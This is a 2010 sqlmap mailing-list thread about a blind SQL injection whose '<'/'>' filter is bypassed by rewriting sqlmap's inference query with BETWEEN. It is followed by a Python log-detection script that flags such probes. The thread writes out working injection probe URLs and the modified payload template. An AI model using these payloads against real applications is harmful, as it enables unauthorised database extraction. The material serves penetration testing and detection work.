Re: [sqlmap-users] blind sql injection problem
From: Miroslav S. <mir...@gm...> - 2010-02-23 11:14:28
Hi.
We'll take into consideration the implementation of a program option which
could do this automatically - in the case of inference tests, usage of the BETWEEN
program structure instead of the standard lesser/greater - or maybe use it as a
primary concept.
Kind regards.
On Tue, Feb 23, 2010 at 10:59 AM, velky brat <vel...@gm...> wrote:
> Ok, I have resolved the problem. Just brief info for other users:
> If characters like '<' or '>' are filtered, it is possible to modify query
> like this
>
>
> <inference query="AND ORD(MID((%s), %d, 1)) BETWEEN 0 AND %d"/>
>
> vb
>
>
> On Sat, Feb 20, 2010 at 6:38 PM, velky brat <vel...@gm...> wrote:
>
>> Hello,
>> I have found a blind SQL injection in the GET parameter of an audited MySQL
>> application (sqlmap is also able to identify the injection), but it is not
>> possible to dump any data (like --current-user or --current-db). The only
>> option which is working is --fingerprint (gives the correct result of MySQL 5
>> version); all other options gave the same result as "None".
>> Because it looked strange to me, I made some basic tests manually with the
>> following results:
>>
>>
>> http://localhost/index.php?id=9 AND 1 = 1 ---> TRUE (should be TRUE)
>> http://localhost/index.php?id=9 AND 1 = 0 ---> FALSE (should be FALSE)
>>
>> http://localhost/index.php?id=9 AND 6 > 5 ---> FALSE (should be TRUE)
>> http://localhost/index.php?id=9 AND 6 < 5 ---> FALSE (should be FALSE)
>>
>> http://localhost/index.php?id=9 AND 6 BETWEEN 0 and 5 ---> FALSE
>> http://localhost/index.php?id=9 AND 6 BETWEEN 0 and 10 ---> TRUE
>>
>> As you can see from these results, it looks like the characters "<" and ">"
>> are filtered within the application.
>>
>> However, the injection is still working. I suppose that sqlmap uses these
>> characters ("<", ">") really often during dumping of data from the database.
>> So I have changed the following line in the mysql section of the queries.xml file:
>>
>> original line:
>> <inference query="AND ORD(MID((%s), %d, 1)) > %d"/>
>>
>> updated line:
>> <inference query="AND ORD(MID((%s), %d, 1)) BETWEEN 0 AND %d"/>
>>
>> Unfortunately, the result was the same (None). What else should be modified?
>>
>> Is it possible to use the BETWEEN statement instead of ">" in the current
>> version of sqlmap?
>> Is it already supported somehow in sqlmap or would it appear in future
>> versions?
>>
>> Thank you in advance
>>
>> vb
>>
>>
>
>
--
Miroslav Stampar
E-mail / Jabber: miroslav.stampar (at) gmail.com
Mobile: +385921010204 (HR 0921010204)
PGP Key ID: 0xB5397B1B
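The thread shows that a filter which only strips "<" and ">" still lets BETWEEN-based boolean inference through. The following added example (not from the thread or from sqlmap) runs a pattern-based detector over constructed access-log lines built around the URLs reported above and lists the probes the angle-bracket filter misses; the log lines, the `x` column placeholder and the pattern set are assumptions.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# The application filter described in the thread: only angle brackets are caught.
NAIVE_FILTER = re.compile(r"[<>]")

# Boolean inference shapes seen in the thread, including the BETWEEN rewrite
# that slips past the angle-bracket filter. Case-insensitive, like MySQL keywords.
INFERENCE_PATTERNS = [
    re.compile(r"\bAND\s+\d+\s*=\s*\d+", re.I),                           # AND 1 = 1
    re.compile(r"\bAND\s+[\w()\s,]+?\s*[<>]=?\s*\d+", re.I),               # AND 6 > 5
    re.compile(r"\bAND\s+[\w()\s,]+?\s+BETWEEN\s+\d+\s+AND\s+\d+", re.I),  # AND 6 BETWEEN 0 AND 5
]

# Constructed access-log lines (assumed, not from the thread) built around the reported URLs.
SAMPLE_LOG = [
    '127.0.0.1 - - [23/Feb/2010:10:59:01 +0100] "GET /index.php?id=9 HTTP/1.1" 200 512',
    '127.0.0.1 - - [23/Feb/2010:10:59:02 +0100] "GET /index.php?id=9%20AND%201%20=%201 HTTP/1.1" 200 512',
    '127.0.0.1 - - [23/Feb/2010:10:59:03 +0100] "GET /index.php?id=9%20AND%206%20%3E%205 HTTP/1.1" 200 97',
    '127.0.0.1 - - [23/Feb/2010:10:59:04 +0100] "GET /index.php?id=9%20AND%206%20BETWEEN%200%20and%2010 HTTP/1.1" 200 512',
    '127.0.0.1 - - [23/Feb/2010:10:59:05 +0100] "GET /index.php?id=9%20AND%20ORD(MID((x),1,1))%20BETWEEN%200%20AND%2064 HTTP/1.1" 200 512',
]
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')  # request path inside a common-log line

def analyze(url: str) -> dict:
    """Per decoded query parameter: would the naive filter catch it, and does it look like inference?"""
    result = {}
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        result[name] = {
            "naive_blocked": bool(NAIVE_FILTER.search(value)),
            "inference": any(p.search(value) for p in INFERENCE_PATTERNS),
        }
    return result

def missed_by_filter(lines) -> list:
    """(line number, parameter) for inference probes the angle-bracket filter lets through."""
    missed = []
    for n, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        for name, verdict in analyze(m.group(1)).items():
            if verdict["inference"] and not verdict["naive_blocked"]:
                missed.append((n, name))
    return missed

if __name__ == "__main__":
    for n, name in missed_by_filter(SAMPLE_LOG):
        print("probe not caught by '<'/'>' filter: line %d, parameter %s" % (n, name))
```

The lesson is the one from the thread: a character blocklist is not a control against inference; parameterised queries and detection on the request pattern are.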